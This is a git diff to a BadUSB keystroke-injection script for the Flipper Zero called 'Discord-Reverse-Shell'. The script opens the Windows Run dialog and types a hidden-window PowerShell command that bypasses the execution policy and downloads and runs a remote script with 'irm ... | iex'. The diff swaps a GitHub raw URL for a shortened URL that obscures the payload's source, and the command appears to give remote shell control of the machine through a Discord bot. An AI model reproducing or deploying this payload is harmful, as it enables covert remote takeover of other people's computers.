diff --git a/Discord-Reverse-Shell/Discord-Reverse-Shell.txt b/Discord-Reverse-Shell/Discord-Reverse-Shell.txt index b71a8a0..31e7248 100644 --- a/Discord-Reverse-Shell/Discord-Reverse-Shell.txt +++ b/Discord-Reverse-Shell/Discord-Reverse-Shell.txt @@ -18,6 +18,6 @@ REM open powershell (remove "-W H" to show the window) DELAY 1000 GUI r DELAY 750 -STRING powershell -NoP -Ep Bypass -W H -C $ch = 'CHANNEL_ID'; $tk = 'BOT_TOKEN'; irm https://raw.githubusercontent.com/beigeworm/BadUSB-Files-For-FlipperZero/main/Discord-Reverse-Shell/main.ps1 | iex +STRING powershell -NoP -Ep Bypass -W H -C $ch = 'CHANNEL_ID'; $tk = 'BOT_TOKEN'; irm https://bw0.cc/dcrs | iex ENTER